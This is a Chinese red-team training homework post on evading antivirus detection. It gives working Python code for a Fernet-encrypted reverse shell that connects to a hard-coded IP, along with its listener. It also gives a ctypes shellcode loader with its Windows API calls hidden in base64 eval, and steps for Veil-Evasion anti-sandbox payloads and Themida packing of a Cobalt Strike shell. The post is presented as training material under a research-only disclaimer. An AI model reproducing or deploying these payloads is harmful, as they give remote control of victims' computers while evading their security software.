本文作者:某学员A(红队培训班2期学员)
1、加密或编码或混淆过杀软静态检测
l 如下代码为实现payload经过fernet对称加密的shellcode生成器:
#coding:utf-8#run by victimfrom cryptography.fernet import Fernetimport ospayload=b'''import socket, subprocessremote_ip='8.129.211.1'remote_port=12345s=socket.socket(socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_TCP)s.connect((remote_ip,remote_port))while True:data=s.recv(2048)if data=='quit' or data=='exit' or data=='': breakresult=subprocess.Popen(data, shell=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)s.send(result.stdout.read()+result.stderr.read())s.close()'''print('Now, Encrypting......')fernet1=Fernet(Fernet.generate_key())encoded_payload=fernet1.encrypt(bytes(payload))file1=open('shellcode.py','w+')file1.write('from cryptography.fernet import Fernet'+'n'+'fernet1=Fernet(Fernet.generate_key())'+'n'+'encoded_payload='+encoded_payload+'n'+'exec(fernet1.decrypt(encoded_payload))')file1.close()print('Encryption Complete.')print('Now, Compiling......')os.system('pyinstaller -F shellcode.py --noconsole')print('Compile Complete.')#run by hacker'''import sockets=socket.socket(socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_TCP)s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)local_ip=''local_port=12345s.bind((local_ip, local_port))s.listen(20)print('Listening...')(conn, addr)=s.accept()print('Connected by', addr)while True:cmd=raw_input('Shell:')conn.send(cmd)if cmd=='quit' or cmd=='exit' or cmd=='': breakdata=conn.recv(2048)print dataconn.close()'''
windows defender检测结果:
360检测结果:
l 通过base64对关键win32 API函数执行语句进行编码:
#coding:utf-8#run by victimimport ctypes, base64payload = b""payload += b"xfcxe8x8fx00x00x00x60x89xe5x31xd2x64x8b"payload += b"x52x30x8bx52x0cx8bx52x14x0fxb7x4ax26x8b"payload += b"x72x28x31xffx31xc0xacx3cx61x7cx02x2cx20"payload += b"xc1xcfx0dx01xc7x49x75xefx52x8bx52x10x8b"payload += b"x42x3cx01xd0x57x8bx40x78x85xc0x74x4cx01"payload += b"xd0x8bx58x20x8bx48x18x50x01xd3x85xc9x74"payload += b"x3cx31xffx49x8bx34x8bx01xd6x31xc0xc1xcf"payload += b"x0dxacx01xc7x38xe0x75xf4x03x7dxf8x3bx7d"payload += b"x24x75xe0x58x8bx58x24x01xd3x66x8bx0cx4b"payload += b"x8bx58x1cx01xd3x8bx04x8bx01xd0x89x44x24"payload += b"x24x5bx5bx61x59x5ax51xffxe0x58x5fx5ax8b"payload += b"x12xe9x80xffxffxffx5dx68x33x32x00x00x68"payload += b"x77x73x32x5fx54x68x4cx77x26x07x89xe8xff"payload += b"xd0xb8x90x01x00x00x29xc4x54x50x68x29x80"payload += b"x6bx00xffxd5x6ax0ax68x08x81xd3x01x68x02"payload += b"x00x30x39x89xe6x50x50x50x50x40x50x40x50"payload += b"x68xeax0fxdfxe0xffxd5x97x6ax10x56x57x68"payload += b"x99xa5x74x61xffxd5x85xc0x74x0axffx4ex08"payload += b"x75xecxe8x67x00x00x00x6ax00x6ax04x56x57"payload += b"x68x02xd9xc8x5fxffxd5x83xf8x00x7ex36x8b"payload += b"x36x6ax40x68x00x10x00x00x56x6ax00x68x58"payload += b"xa4x53xe5xffxd5x93x53x6ax00x56x53x57x68"payload += b"x02xd9xc8x5fxffxd5x83xf8x00x7dx28x58x68"payload += b"x00x40x00x00x6ax00x50x68x0bx2fx0fx30xff"payload += b"xd5x57x68x75x6ex4dx61xffxd5x5ex5exffx0c"payload += b"x24x0fx85x70xffxffxffxe9x9bxffxffxffx01"payload += b"xc3x29xc6x75xc1xc3xbbxf0xb5xa2x56x6ax00"payload += b"x53xffxd5"payload=bytearray(payload)ctypes.windll.kernel32.VirtualAlloc.restype=ctypes.c_intbuf=(ctypes.c_char*len(payload)).from_buffer(payload)# ptr=ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(payload)), ctypes.c_int(0x3000), ctypes.c_int(0x40))eval(base64.b64decode('cHRyPWN0eXBlcy53aW5kbGwua2VybmVsMzIuVmlydHVhbEFsbG9jKGN0eXBlcy5jX2ludCgwKSwgY3R5cGVzLmNfaW50KGxlbihwYXlsb2FkKSksIGN0eXBlcy5jX2ludCgweDMwMDApLCBjdHlwZXMuY19pbnQoMHg0MCkp'))# ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr), buf, ctypes.c_int(len(payload)))eval(base64.b64decode('Y3R5cGVzLndpbmRsbC5rZXJuZWwzMi5SdGxNb3ZlTWVtb3J5KGN0eXBlcy5jX2ludChwdHIpLCBidWYsIGN0eXBlcy5jX2ludChsZW4ocGF5bG9hZCkpKQ=='))# handler=ctypes.windll.kernel32.CreateThread(ctypes.c_int(0), ctypes.c_int(0), ctypes.c_int(ptr), ctypes.c_int(0), ctypes.c_int(0), ctypes.pointer(ctypes.c_int(0)))eval(base64.b64decode('aGFuZGxlcj1jdHlwZXMud2luZGxsLmtlcm5lbDMyLkNyZWF0ZVRocmVhZChjdHlwZXMuY19pbnQoMCksIGN0eXBlcy5jX2ludCgwKSwgY3R5cGVzLmNfaW50KHB0ciksIGN0eXBlcy5jX2ludCgwKSwgY3R5cGVzLmNfaW50KDApLCBjdHlwZXMucG9pbnRlcihjdHlwZXMuY19pbnQoMCkpKQ=='))# ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handler), ctypes.c_int(-1))eval(base64.b64decode('Y3R5cGVzLndpbmRsbC5rZXJuZWwzMi5XYWl0Rm9yU2luZ2xlT2JqZWN0KGN0eXBlcy5jX2ludChoYW5kbGVyKSwgY3R5cGVzLmNfaW50KC0xKSk='))
windows defender检测结果:
360检测结果:
2、添加反沙盒机制过杀软动态检测
在kali linux中下载veil-evasion(sudo apt-get install veil)并以silent方式安装,通过veil命令打开:
生成免杀payload:
通过set命令设置lhost、lport、minram、sleep、detectdebug、sandboxprocess等参数后,如下所示:
通过generate命令生成payload,包括payload.py(靶机端运行)和payload.rc(攻击端MSF运行):
3、隐藏或编码shellcode过特征检测
将Cobalt Strike生成的反弹shell进行themida加壳处理:
360检测结果:
windows defender检测结果:
扫描下方二维码加入星球学习
加入后邀请你进入内部微信群,内部微信群永久有效!
本文始发于微信公众号(Ms08067安全实验室):红队培训班作业 | 混淆&反沙盒机制&隐藏shellcode 过杀软静态检测
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论